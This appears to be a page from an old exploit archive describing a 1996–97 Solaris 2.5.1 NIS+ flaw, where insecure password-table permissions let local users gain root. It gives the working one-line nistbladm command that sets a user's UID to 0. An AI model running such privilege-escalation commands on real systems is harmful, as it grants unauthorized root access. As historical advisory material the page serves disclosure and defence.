Insecure Solaris default nissetup password table permissions!

Description:The program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!
Author:Well known
Compromise: root (local)
Vulnerable Systems:Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris).
Date:10 February 1996
Notes:Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that?

Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
Subject: NIS+, Solaris 2.5.1

Ever tried to change your NIS+ password with
the "nistbladm" command ? Works fine, but you
can also change your UID ....

$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir

$ niscat passwd.org_dir | grep alice

. . . . . . . . . . .

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: